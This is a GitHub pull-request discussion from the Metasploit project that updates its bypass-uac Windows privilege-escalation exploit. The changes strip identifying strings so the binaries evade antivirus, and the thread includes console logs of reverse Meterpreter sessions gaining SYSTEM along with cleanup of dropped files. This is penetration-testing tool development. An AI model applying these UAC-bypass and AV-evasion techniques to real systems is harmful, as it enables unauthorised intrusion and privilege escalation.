New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update/Revamp of bypass-uac #3028

Merged
merged 15 commits into from Feb 27, 2014

Conversation

Projects
None yet
3 participants
@thelightcosine

thelightcosine commented Feb 23, 2014

This PR updates the source code of bypass-uac:

Project is updated to compile under Visual Studio 2013 to conform with our current build practices
Command Line usage help has been removed to eliminate unnecessary code and obvious strings
The CLogger class has been removed as it is unwanted outside of debugging and creates additional obvious strings and behaviour which lead to AV detections

The result is two new binaries that still work as intended but avoid almost all AV detections( The x64 binary does avoid all of them)

VERIFICATION STEPS

  • Get a shell on a Windows Vista or later box that does not have system privs
  • verify getystsem fails due to UAC
  • verify you are under an Admin user's context
  • Run the bypass-uac local exploit
  • VERIFY you get a new session
  • VERIFY getsystem now works on this new session
  • VERIFY the same steps on an x64 system using an x64 payload

Optional Verification Steps

  • pick you favorite AV
  • install it on the target system
  • reproduce the above steps
  • VERIFY you still get an elevated session
David Maloney David Maloney
remove unneccsary logging elements
update soloutions for VS2013
remove the CLogger
Remove Print Usage
this removes unneccsary strings that can
be used to easily identify our executable
@OJ

This comment has been minimized.

OJ commented on 2895807 Feb 22, 2014

Looks good to me mate. Logging in something like this seems a bit odd anyway. Bigger payloads, more identifiable information, etc. There's no real upside to having it there except during debugging. Instead it should have had the dprintf approach that we use in Meterpreter.

The PlatformToolset we use in Meterpreter is v120_xp and I'd usually suggest that people do the same with their stuff. However, given that UAC isn't something that exists on XP it doesn't matter in this case :)

+1 to this, gets my vote.

David Maloney David Maloney
put new binaries in place
after cleaning up the source a bit and
updateing it for 2013, compiled new BINs.
These BINS avoid almost all current AV detections
and have been tested to ensure they still work.
@thelightcosine

This comment has been minimized.

thelightcosine commented Feb 23, 2014

@OJ thanks mate! If you see any additional code cleanup or improvements to make, by all means jump in on this. You are far more expert in this arena than I.

@Meatballs1

This comment has been minimized.

Contributor

Meatballs1 commented Feb 23, 2014

Dude: #2431

@OJ

This comment has been minimized.

Contributor

OJ commented Feb 23, 2014

You say:

pick you favorite AV

I hear

pick your favorite pinepple to sit on.

I'll give this a crack in the next couple of days when I'm back at home. There's probably not much more that can be done, but I'll give the rest of the source a look at some point too.

You are far more expert in this arena than I.

The blind leading the blind :)

@OJ

This comment has been minimized.

Contributor

OJ commented Feb 23, 2014

It is just me or does it feel like every bit of work that's done is just a late rehash of what @Meatballs1 has already done? :)

OJ added some commits Feb 26, 2014

Fix VS 2013 build, remove old files, rejig project config
This wasn't building cleanly for a few reasons with VS 2013 on my desktop.
This commit fixes this problems with the configuration and makes things fit
with the way we're now doing things (ie. output locations, etc).

Incremental builds are disabled as they were causing problems, but this isn't
a concern for a project as small as this.

@OJ OJ self-assigned this Feb 26, 2014

@OJ

This comment has been minimized.

Contributor

OJ commented Feb 26, 2014

From my testing there's a bit of strange behaviour. For the most part this works, but this always happens:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 10.1.10.40:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (769024 bytes) to 10.1.10.43
[*] Meterpreter session 4 opened (10.1.10.40:4444 -> 10.1.10.43:55108) at 2014-02-26 16:47:59 +1000
[-] Exploit failed: Rex::TimeoutError Operation timed out.

meterpreter > getuid
Server username: WIN-KM66F94HDLL\OJ
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Notice how the exploit claims that it has failed, which happens after a period of time where it appears to hang for a while. I'm not sure what's going on here. This is Windows 7 x86 SP1 machine.

Thoughts @dmaloney-r7 ?

@OJ

This comment has been minimized.

Contributor

OJ commented Feb 26, 2014

The same behaviour occurs when the x86 payload is used on x64.

Also, if the x64 payload is used on x64, this happens:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 10.1.10.40:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
msf exploit(bypassuac) > 

It's as if it is failing to pick up that the target OS for the session is x64 and it's pushing a 32-bit stager up and trying to inject an x64 payload.

Are you seeing anything similar @dmaloney-r7 ?

Adjust project config
* Remove editbin usage for console apps
* Remove whole program optimisation
@OJ

This comment has been minimized.

Contributor

OJ commented Feb 26, 2014

You'll find a PR here thelightcosine#11 which helps in revamping the code a bit but more from the compile/build side rather than the AV avoidance side.

@Meatballs1

This comment has been minimized.

Contributor

Meatballs1 commented Feb 26, 2014

@OJ I think the x64 issue is that it is embedding x64 shellcode into an x86 template (ie 73kb x86 instead of 6kb x64 template)

This should be resolved with #2661 if anyone cares...

N.B. if you look at my output for that I also hit [-] Exploit failed: Rex::TimeoutError Operation timed out. so it isn't related to this module.

@OJ

This comment has been minimized.

Contributor

OJ commented Feb 26, 2014

Yeah that was what I thought it might have been to mate. Certainly a sign when the program that is crashing on the desktop is Apache bench, which shouldn't show its face in x64!

If that's the case then I'll land this baby for now and push on with the rest. Sound ok to you guys?

@Meatballs1

This comment has been minimized.

Contributor

Meatballs1 commented Feb 26, 2014

Sounds good to me.

dmaloney-r7 added some commits Feb 26, 2014

@thelightcosine

This comment has been minimized.

thelightcosine commented Feb 26, 2014

I landed Meatballs PR, and OJ's PR against this branch, but I do still see the Timeout. I had assumed before that it was an issue with my VM environment.

David Maloney added some commits Feb 26, 2014

David Maloney David Maloney
David Maloney David Maloney
cleanup methods in bypassuac module
apply the same sort of method cleanup as in
Meatballs injection based module.
@OJ

This comment has been minimized.

Contributor

OJ commented Feb 26, 2014

So it appears that the bypassuac exe is no longer shutting down nicely. Taking a look at it now.

@OJ

This comment has been minimized.

Contributor

OJ commented Feb 26, 2014

Can someone tell me WTF this does? https://github.com/dmaloney-r7/metasploit-framework/blob/feature/bypassuac/revamp/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp#L225

I know it's been around for a while, but it looks like it does nothing.

@Meatballs1

This comment has been minimized.

Contributor

Meatballs1 commented Feb 27, 2014

Redundant debugging?

@thelightcosine

This comment has been minimized.

thelightcosine commented Feb 27, 2014

looks whack to me

David Maloney added some commits Feb 27, 2014

David Maloney David Maloney
David Maloney David Maloney
remove some dead code paths
refactor some dead conditionals and a case/switch
that wasn't doing anything
@thelightcosine

This comment has been minimized.

thelightcosine commented Feb 27, 2014

@OJ i think i created that dead codepath when i removed the logger now that I think about it. Removed a few other spots like that

David Maloney added some commits Feb 27, 2014

David Maloney David Maloney
make bypassuac module clean itself up
since the IO redirection hangs our original process
we have the moudle wait for the session then kills
the spawning process and delete the exe we dropped
David Maloney David Maloney
cleanup tior and .tmp files
bypassuac module now also cleans
the tior.exe and all the .tmp files so we have a
clean environemnt afterwards
@OJ

This comment has been minimized.

OJ commented on lib/msf/core/post/common.rb in f66709b Feb 27, 2014

Do you think it'd be better to have an option in the arg list to say "please terminate this process" rather than force it every time? The function name doesn't imply process closing.

@OJ

This comment has been minimized.

OJ commented on modules/exploits/windows/local/bypassuac.rb in f66709b Feb 27, 2014

finish him

@OJ

This comment has been minimized.

OJ commented on f66709b Feb 27, 2014

Yay! She works on x64:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 10.1.10.40:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 6144 bytes long being uploaded..
[*] Sending stage (971264 bytes) to 10.1.10.32
[*] Meterpreter session 6 opened (10.1.10.40:4444 -> 10.1.10.32:63919) at 2014-02-28 09:09:41 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64

I'm going to land this baby.

OJ added a commit that referenced this pull request Feb 27, 2014

@OJ OJ merged commit b952b10 into rapid7:master Feb 27, 2014

1 check passed

default The Travis CI build passed
Details

@thelightcosine thelightcosine deleted the thelightcosine:feature/bypassuac/revamp branch Mar 4, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment